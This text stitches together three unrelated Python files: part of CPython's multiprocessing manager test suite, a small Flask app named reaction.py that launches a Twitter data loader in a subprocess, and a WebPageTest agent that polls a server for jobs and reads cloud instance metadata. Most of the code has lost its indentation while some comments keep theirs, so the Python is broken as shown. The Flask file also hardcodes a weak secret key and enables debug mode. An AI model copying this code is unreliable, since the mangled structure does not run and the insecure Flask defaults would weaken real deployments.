o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in not_exported are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
not_exported=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
if type_ == 'manager':
Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
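    # As an illustration of the naming rule above: a hypothetical base class
    # _TestFoo with ALLOWED_TYPES = ('processes', 'threads') is installed twice
    # in the remote module, as WithProcessesTestFoo (mixing in ProcessesMixin)
    # and WithThreadsTestFoo (mixing in ThreadsMixin).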
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
    # Sleep 500 ms to give child processes time to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
reaction.py
|
"""Core Flask app routes."""
from flask import Flask, render_template, url_for, redirect, flash
from flask import current_app as app
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
from application.maindriver import ytload, twload
from application import create_app, reload_app
from multiprocessing import Process
import os
import datetime
#from application.plotlydash.dashboard import create_dashboard
#app = Flask(__name__)
app.config['SECRET_KEY'] = 'acbsd'
@app.route("/")
@app.route("/home")
def home():
return render_template('home.html')
@app.route("/about")
def about():
return render_template('about.html', title='About')
@app.route("/overview")
def overview():
return render_template('overview.html', title='Overview')
@app.route("/twitter")
def twitter():
return render_template('twitter.html', title='Twitter')
@app.route("/reddit")
def reddit():
return render_template('reddit.html', title='Reddit')
@app.route("/youtube")
def youtube():
return render_template('youtube.html', title='Youtube')
@app.route("/analyse", methods=['GET','POST'])
def analyse():
class inputform(FlaskForm):
query=StringField('Enter the term you want to analyse.', validators=[DataRequired()])
submit= SubmitField('Gather Data')
form=inputform()
if form.is_submitted():
#twload(form.query.data)
#ytload(form.query.data)
        # Run the loader in a separate process so a crash in the data
        # gathering code cannot take down the Flask worker.
        p = Process(target=twload, args=(form.query.data,))
        p.start()
        p.join()
        flash(f'Almost done! Now CLICK on Dashboard to start creating your analytics dashboard for {form.query.data}.', 'success')
        return redirect(url_for('home'))
return render_template('analyse.html', title='Analyse',form=form)
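# A minimal sketch (assuming ytload accepts the same single query argument as
# twload, which matches how both are imported above) of gathering both data
# sources concurrently instead of one after the other. It is not wired into the
# /analyse route and is shown only as an illustration.
def gather_concurrently(query):
    # One worker process per loader; start them all, then wait for each.
    procs = [Process(target=fn, args=(query,)) for fn in (twload, ytload)]
    for p in procs:
        p.start()
    for p in procs:
        p.join()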
if __name__ == '__main__':
app.run(debug=True)
|
webpagetest.py
|
# Copyright 2017 Google Inc. All rights reserved.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Main entry point for interfacing with WebPageTest server"""
from datetime import datetime
import gzip
import logging
import os
import platform
import Queue
import re
import shutil
import socket
import subprocess
import threading
import time
import urllib
import zipfile
import psutil
import monotonic
import ujson as json
DEFAULT_JPEG_QUALITY = 30
class WebPageTest(object):
"""Controller for interfacing with the WebPageTest server"""
# pylint: disable=E0611
def __init__(self, options, workdir):
import requests
self.fetch_queue = Queue.Queue()
self.fetch_result_queue = Queue.Queue()
self.job = None
self.first_failure = None
self.session = requests.Session()
self.options = options
self.fps = options.fps
self.test_run_count = 0
self.log_formatter = logging.Formatter(fmt="%(asctime)s.%(msecs)03d - %(message)s",
datefmt="%H:%M:%S")
self.log_handler = None
# Configurable options
self.url = options.server
self.location = ''
self.test_locations = []
if options.location is not None:
self.test_locations = options.location.split(',')
self.location = str(self.test_locations[0])
self.key = options.key
self.time_limit = 120
self.cpu_scale_multiplier = None
# get the hostname or build one automatically if we are on a vmware system
# (specific MAC address range)
hostname = platform.uname()[1]
interfaces = psutil.net_if_addrs()
if interfaces is not None:
logging.debug('Interfaces:')
logging.debug(interfaces)
for interface in interfaces:
iface = interfaces[interface]
for addr in iface:
match = re.search(r'^00[\-:]50[\-:]56[\-:]00[\-:]'\
r'([\da-fA-F]+)[\-:]([\da-fA-F]+)$', addr.address)
if match:
server = match.group(1).strip('0')
machine = match.group(2)
hostname = 'VM{0}-{1}'.format(server, machine)
self.pc_name = hostname if options.name is None else options.name
self.auth_name = options.username
self.auth_password = options.password if options.password is not None else ''
self.validate_server_certificate = options.validcertificate
self.instance_id = None
self.zone = None
# Get the screen resolution if we're in desktop mode
self.screen_width = None
self.screen_height = None
if not self.options.android and not self.options.iOS:
if self.options.xvfb:
self.screen_width = 1920
self.screen_height = 1200
elif platform.system() == 'Windows':
from win32api import GetSystemMetrics
self.screen_width = GetSystemMetrics(0)
self.screen_height = GetSystemMetrics(1)
elif platform.system() == 'Darwin':
try:
from AppKit import NSScreen
self.screen_width = int(NSScreen.screens()[0].frame().size.width)
self.screen_height = int(NSScreen.screens()[0].frame().size.height)
except Exception:
pass
# See if we have to load dynamic config options
if self.options.ec2:
self.load_from_ec2()
elif self.options.gce:
self.load_from_gce()
# Set the session authentication options
if self.auth_name is not None:
self.session.auth = (self.auth_name, self.auth_password)
self.session.verify = self.validate_server_certificate
if options.cert is not None:
if options.certkey is not None:
self.session.cert = (options.cert, options.certkey)
else:
self.session.cert = options.cert
# Set up the temporary directories
self.workdir = os.path.join(workdir, self.pc_name)
self.persistent_dir = self.workdir + '.data'
self.profile_dir = os.path.join(self.workdir, 'browser')
if os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
# If we are running in a git clone, grab the date of the last
# commit as the version
self.version = '17.12'
try:
directory = os.path.abspath(os.path.dirname(__file__))
out = subprocess.check_output('git log -1 --format=%cd --date=raw',
shell=True, cwd=directory)
if out is not None:
matches = re.search(r'^(\d+)', out)
if matches:
timestamp = int(matches.group(1))
git_date = datetime.utcfromtimestamp(timestamp)
                    self.version = git_date.strftime('%y%m%d.%H%M%S')
except Exception:
pass
# Load the discovered browser margins
self.margins = {}
margins_file = os.path.join(self.persistent_dir, 'margins.json')
if os.path.isfile(margins_file):
with open(margins_file, 'rb') as f_in:
self.margins = json.load(f_in)
# Override the public webpagetest server automatically
if self.url is not None and self.url.find('www.webpagetest.org') >= 0:
self.url = 'http://agent.webpagetest.org/work/'
# pylint: enable=E0611
def benchmark_cpu(self):
"""Benchmark the CPU for mobile emulation"""
self.cpu_scale_multiplier = 1.0
if not self.options.android and not self.options.iOS:
import hashlib
logging.debug('Starting CPU benchmark')
hash_val = hashlib.sha256()
with open(__file__, 'rb') as f_in:
hash_data = f_in.read(4096)
start = monotonic.monotonic()
            # 106k iterations take ~1 second on the reference machine
for _ in xrange(106000):
hash_val.update(hash_data)
elapsed = monotonic.monotonic() - start
self.cpu_scale_multiplier = 1.0 / elapsed
logging.debug('CPU Benchmark elapsed time: %0.3f, multiplier: %0.3f',
elapsed, self.cpu_scale_multiplier)
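    # Worked example of the multiplier above (numbers are illustrative): if the
    # reference machine hashes the sample in 1.0 second and this machine takes
    # 0.5 seconds, cpu_scale_multiplier is 1.0 / 0.5 = 2.0. A job asking for
    # throttle_cpu = 2.0 is then actually throttled at 2.0 * 2.0 = 4.0 in
    # get_test(), keeping emulated-mobile timings comparable across agents of
    # different speeds.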
def get_persistent_dir(self):
"""Return the path to the persistent cache directory"""
return self.persistent_dir
def load_from_ec2(self):
"""Load config settings from EC2 user data"""
import requests
session = requests.Session()
proxies = {"http": None, "https": None}
        # The Windows AMIs use static routes which are not copied across regions.
# This sets them up before we attempt to access the metadata
if platform.system() == "Windows":
from .os_util import run_elevated
directory = os.path.abspath(os.path.dirname(__file__))
ec2_script = os.path.join(directory, 'support', 'ec2', 'win_routes.ps1')
run_elevated('powershell.exe', ec2_script)
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/latest/user-data',
timeout=30, proxies=proxies)
if len(response.text):
self.parse_user_data(response.text)
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/latest/meta-data/instance-id',
timeout=30, proxies=proxies)
if len(response.text):
self.instance_id = response.text.strip()
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get(
'http://169.254.169.254/latest/meta-data/placement/availability-zone',
timeout=30, proxies=proxies)
if len(response.text):
self.zone = response.text.strip()
if not len(self.test_locations):
self.location = self.zone[:-1]
if platform.system() == "Linux":
self.location += '-linux'
self.test_locations = [self.location]
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
def load_from_gce(self):
"""Load config settings from GCE user data"""
import requests
session = requests.Session()
proxies = {"http": None, "https": None}
ok = False
while not ok:
try:
response = session.get(
'http://169.254.169.254/computeMetadata/v1/instance/attributes/wpt_data',
headers={'Metadata-Flavor':'Google'},
timeout=30, proxies=proxies)
if len(response.text):
self.parse_user_data(response.text)
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/computeMetadata/v1/instance/id',
headers={'Metadata-Flavor':'Google'},
timeout=30, proxies=proxies)
if len(response.text):
self.instance_id = response.text.strip()
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
if not len(self.test_locations):
ok = False
while not ok:
try:
response = session.get('http://metadata.google.internal/computeMetadata/v1/instance/zone',
headers={'Metadata-Flavor':'Google'},
timeout=30, proxies=proxies)
if len(response.text):
zone = response.text.strip()
position = zone.rfind('/')
if position > -1:
zone = zone[position + 1:]
self.zone = zone
self.location = 'gce-' + self.zone[:-2]
if platform.system() == "Linux":
self.location += '-linux'
self.test_locations = [self.location]
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
def parse_user_data(self, user_data):
"""Parse the provided user data and extract the config info"""
logging.debug("User Data: %s", user_data)
options = user_data.split()
for option in options:
try:
parts = option.split('=', 1)
if len(parts) == 2:
key = parts[0].strip()
value = parts[1].strip()
logging.debug('Setting config option "%s" to "%s"', key, value)
if key == 'wpt_server':
if re.search(r'^https?://', value):
self.url = value
if value.endswith('/'):
self.url += 'work/'
else:
self.url += '/work/'
else:
self.url = 'http://{0}/work/'.format(value)
if key == 'wpt_url':
self.url = value
elif key == 'wpt_loc' or key == 'wpt_location':
if value is not None:
self.test_locations = value.split(',')
self.location = str(self.test_locations[0])
if key == 'wpt_location':
append = []
for loc in self.test_locations:
append.append('{0}_wptdriver'.format(loc))
if len(append):
self.test_locations.extend(append)
elif key == 'wpt_key':
self.key = value
elif key == 'wpt_timeout':
self.time_limit = int(re.search(r'\d+', str(value)).group())
elif key == 'wpt_username':
self.auth_name = value
elif key == 'wpt_password':
self.auth_password = value
elif key == 'wpt_validcertificate' and value == '1':
self.validate_server_certificate = True
elif key == 'validcertificate' and value == '1':
self.validate_server_certificate = True
elif key == 'wpt_fps':
self.fps = int(re.search(r'\d+', str(value)).group())
elif key == 'fps':
self.fps = int(re.search(r'\d+', str(value)).group())
except Exception:
pass
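    # Illustrative (hypothetical) user-data payload accepted by
    # parse_user_data() -- whitespace-separated key=value pairs:
    #
    #   wpt_server=wpt.example.com wpt_loc=Test wpt_key=secret wpt_timeout=180
    #
    # which sets self.url to 'http://wpt.example.com/work/', the location list
    # to ['Test'], the API key, and a 180 second per-run time limit.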
# pylint: disable=E1101
def get_uptime_minutes(self):
"""Get the system uptime in seconds"""
boot_time = None
try:
boot_time = psutil.boot_time()
except Exception:
pass
if boot_time is None:
try:
boot_time = psutil.get_boot_time()
except Exception:
pass
if boot_time is None:
try:
boot_time = psutil.BOOT_TIME
except Exception:
pass
uptime = None
if boot_time is not None and boot_time > 0:
uptime = int((time.time() - boot_time) / 60)
if uptime is not None and uptime < 0:
uptime = 0
return uptime
# pylint: enable=E1101
def reboot(self):
if platform.system() == 'Windows':
subprocess.call(['shutdown', '/r', '/f'])
else:
subprocess.call(['sudo', 'reboot'])
def get_test(self):
"""Get a job from the server"""
import requests
proxies = {"http": None, "https": None}
from .os_util import get_free_disk_space
if self.cpu_scale_multiplier is None:
self.benchmark_cpu()
if self.url is None:
return None
job = None
locations = list(self.test_locations) if len(self.test_locations) > 1 else [self.location]
location = str(locations.pop(0))
# Shuffle the list order
if len(self.test_locations) > 1:
self.test_locations.append(str(self.test_locations.pop(0)))
count = 0
retry = True
while count < 3 and retry:
retry = False
count += 1
url = self.url + "getwork.php?f=json&shards=1&reboot=1"
url += "&location=" + urllib.quote_plus(location)
url += "&pc=" + urllib.quote_plus(self.pc_name)
if self.key is not None:
url += "&key=" + urllib.quote_plus(self.key)
if self.instance_id is not None:
url += "&ec2=" + urllib.quote_plus(self.instance_id)
if self.zone is not None:
url += "&ec2zone=" + urllib.quote_plus(self.zone)
if self.options.android:
url += '&apk=1'
url += '&version={0}'.format(self.version)
if self.screen_width is not None:
url += '&screenwidth={0:d}'.format(self.screen_width)
if self.screen_height is not None:
url += '&screenheight={0:d}'.format(self.screen_height)
free_disk = get_free_disk_space()
url += '&freedisk={0:0.3f}'.format(free_disk)
uptime = self.get_uptime_minutes()
if uptime is not None:
url += '&upminutes={0:d}'.format(uptime)
logging.info("Checking for work: %s", url)
try:
response = self.session.get(url, timeout=30, proxies=proxies)
if self.options.alive:
with open(self.options.alive, 'a'):
os.utime(self.options.alive, None)
self.first_failure = None
if len(response.text):
if response.text == 'Reboot':
self.reboot()
return None
job = response.json()
logging.debug("Job: %s", json.dumps(job))
# set some default options
job['agent_version'] = self.version
if 'imageQuality' not in job:
job['imageQuality'] = DEFAULT_JPEG_QUALITY
if 'pngScreenShot' not in job:
job['pngScreenShot'] = 0
if 'fvonly' not in job:
job['fvonly'] = 0
if 'width' not in job:
job['width'] = 1024
if 'height' not in job:
job['height'] = 768
if 'browser_width' in job:
job['width'] = job['browser_width']
if 'browser_height' in job:
job['height'] = job['browser_height']
if 'timeout' not in job:
job['timeout'] = self.time_limit
if 'noscript' not in job:
job['noscript'] = 0
if 'Test ID' not in job or 'browser' not in job or 'runs' not in job:
job = None
if 'type' not in job:
job['type'] = ''
if job['type'] == 'traceroute':
job['fvonly'] = 1
if 'fps' not in job:
job['fps'] = self.fps
if job['type'] == 'lighthouse':
job['fvonly'] = 1
job['lighthouse'] = 1
job['keep_lighthouse_trace'] = \
bool('lighthouseTrace' in job and job['lighthouseTrace'])
job['video'] = bool('Capture Video' in job and job['Capture Video'])
job['keepvideo'] = bool('keepvideo' in job and job['keepvideo'])
job['disable_video'] = bool(not job['video'] and \
'disable_video' in job and \
job['disable_video'])
job['interface'] = None
job['persistent_dir'] = self.persistent_dir
if 'throttle_cpu' in job:
throttle = float(re.search(r'\d+\.?\d*', str(job['throttle_cpu'])).group())
throttle *= self.cpu_scale_multiplier
job['throttle_cpu_requested'] = job['throttle_cpu']
job['throttle_cpu'] = throttle
if job is None and len(locations) > 0:
location = str(locations.pop(0))
retry = True
except requests.exceptions.RequestException as err:
logging.critical("Get Work Error: %s", err.strerror)
retry = True
now = monotonic.monotonic()
if self.first_failure is None:
self.first_failure = now
# Reboot if we haven't been able to reach the server for 30 minutes
elapsed = now - self.first_failure
if elapsed > 1800:
self.reboot()
time.sleep(0.1)
except Exception:
pass
self.job = job
return job
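    # The polling URL assembled above ends up looking roughly like this
    # (values are illustrative, not from a real server):
    #
    #   http://server/work/getwork.php?f=json&shards=1&reboot=1
    #       &location=Dulles&pc=agent-01&version=17.12
    #       &screenwidth=1920&screenheight=1200&freedisk=12.345&upminutes=42
    #
    # An empty response means no work is available, the literal text 'Reboot'
    # triggers a reboot, and anything else is parsed as the JSON job.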
def get_task(self, job):
"""Create a task object for the next test run or return None if the job is done"""
task = None
if self.log_handler is not None:
try:
self.log_handler.close()
logging.getLogger().removeHandler(self.log_handler)
self.log_handler = None
except Exception:
pass
if 'current_state' not in job or not job['current_state']['done']:
if 'run' in job:
# Sharded test, running one run only
if 'current_state' not in job:
job['current_state'] = {"run": int(re.search(r'\d+', str(job['run'])).group()),
"repeat_view": False,
"done": False}
elif not job['current_state']['repeat_view'] and \
('fvonly' not in job or not job['fvonly']):
job['current_state']['repeat_view'] = True
else:
return task
elif 'current_state' not in job:
job['current_state'] = {"run": 1, "repeat_view": False, "done": False}
elif not job['current_state']['repeat_view'] and \
('fvonly' not in job or not job['fvonly']):
job['current_state']['repeat_view'] = True
else:
job['current_state']['run'] += 1
job['current_state']['repeat_view'] = False
if job['current_state']['run'] <= job['runs']:
test_id = job['Test ID']
run = job['current_state']['run']
profile_dir = '{0}.{1}.{2:d}'.format(self.profile_dir, test_id, run)
task = {'id': test_id,
'run': run,
'cached': 1 if job['current_state']['repeat_view'] else 0,
'done': False,
'profile': profile_dir,
'error': None,
'log_data': True,
'activity_time': 2,
'combine_steps': False,
'video_directories': [],
'page_data': {},
'navigated': False,
'page_result': None,
'script_step_count': 1}
# Set up the task configuration options
task['port'] = 9222 + (self.test_run_count % 500)
task['task_prefix'] = "{0:d}".format(run)
if task['cached']:
task['task_prefix'] += "_Cached"
task['prefix'] = task['task_prefix']
short_id = "{0}.{1}.{2}".format(task['id'], run, task['cached'])
task['dir'] = os.path.join(self.workdir, short_id)
task['task_video_prefix'] = 'video_{0:d}'.format(run)
if task['cached']:
task['task_video_prefix'] += "_cached"
task['video_subdirectory'] = task['task_video_prefix']
if os.path.isdir(task['dir']):
shutil.rmtree(task['dir'])
os.makedirs(task['dir'])
if not os.path.isdir(profile_dir):
os.makedirs(profile_dir)
if job['current_state']['run'] == job['runs'] or 'run' in job:
if job['current_state']['repeat_view']:
job['current_state']['done'] = True
task['done'] = True
elif 'fvonly' in job and job['fvonly']:
job['current_state']['done'] = True
task['done'] = True
if 'debug' in job and job['debug']:
task['debug_log'] = os.path.join(task['dir'], task['prefix'] + '_debug.log')
try:
self.log_handler = logging.FileHandler(task['debug_log'])
self.log_handler.setFormatter(self.log_formatter)
logging.getLogger().addHandler(self.log_handler)
except Exception:
pass
if 'keepua' not in job or not job['keepua']:
task['AppendUA'] = 'PTST'
if 'UAModifier' in job:
task['AppendUA'] = job['UAModifier']
task['AppendUA'] += '/{0}'.format(self.version)
if 'AppendUA' in job:
if 'AppendUA' in task:
task['AppendUA'] += ' ' + job['AppendUA']
else:
task['AppendUA'] = job['AppendUA']
if 'AppendUA' in task:
task['AppendUA'] = task['AppendUA'].replace('%TESTID%', test_id)\
.replace('%RUN%', str(run))\
.replace('%CACHED%', str(task['cached']))\
.replace('%VERSION%', self.version)
task['block'] = []
if 'block' in job:
block_list = job['block'].split()
for block in block_list:
block = block.strip()
if len(block):
task['block'].append(block)
if 'blockDomains' in job:
if 'host_rules' not in task:
task['host_rules'] = []
if 'block_domains' not in task:
task['block_domains'] = []
domains = re.split('[, ]', job['blockDomains'])
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains'].append(domain)
task['host_rules'].append('"MAP {0} 127.0.0.1"'.format(domain))
self.build_script(job, task)
task['width'] = job['width']
task['height'] = job['height']
if 'mobile' in job and job['mobile']:
if 'browser' in job and job['browser'] in self.margins:
task['width'] = \
job['width'] + max(self.margins[job['browser']]['width'], 0)
task['height'] = \
job['height'] + max(self.margins[job['browser']]['height'], 0)
else:
task['width'] = job['width'] + 20
task['height'] = job['height'] + 120
task['time_limit'] = job['timeout']
task['test_time_limit'] = task['time_limit'] * task['script_step_count']
task['stop_at_onload'] = bool('web10' in job and job['web10'])
task['run_start_time'] = monotonic.monotonic()
# Keep the full resolution video frames if the browser window is smaller than 600px
if 'thumbsize' not in job and (task['width'] < 600 or task['height'] < 600):
job['fullSizeVideo'] = 1
self.test_run_count += 1
if task is None and os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
return task
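    # Example of the naming scheme above for an assumed test id 'ABC123',
    # run 2, repeat view: task_prefix is '2_Cached', the video subdirectory is
    # 'video_2_cached', the per-run directory is '<workdir>/ABC123.2.1', and
    # the DevTools port cycles through 9222-9721 as test_run_count grows.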
def running_another_test(self, task):
"""Increment the port for Chrome and the run count"""
task['port'] = 9222 + (self.test_run_count % 500)
self.test_run_count += 1
def build_script(self, job, task):
"""Build the actual script that will be used for testing"""
task['script'] = []
record_count = 0
# Add script commands for any static options that need them
if 'script' in job:
lines = job['script'].splitlines()
for line in lines:
parts = line.split("\t", 2)
if parts is not None and len(parts):
keep = True
record = False
command = parts[0].lower().strip()
target = parts[1].strip() if len(parts) > 1 else None
value = parts[2].strip() if len(parts) > 2 else None
andwait = command.find('andwait')
if andwait > -1:
command = command[:andwait]
record = True
# go through the known commands
if command == 'navigate':
if target is not None and target[:4] != 'http':
target = 'http://' + target
job['url'] = target
record = True
elif command == 'addheader' or command == 'setheader':
if target is not None and len(target):
separator = target.find(':')
if separator > 0:
name = target[:separator].strip()
header_value = target[separator + 1:].strip()
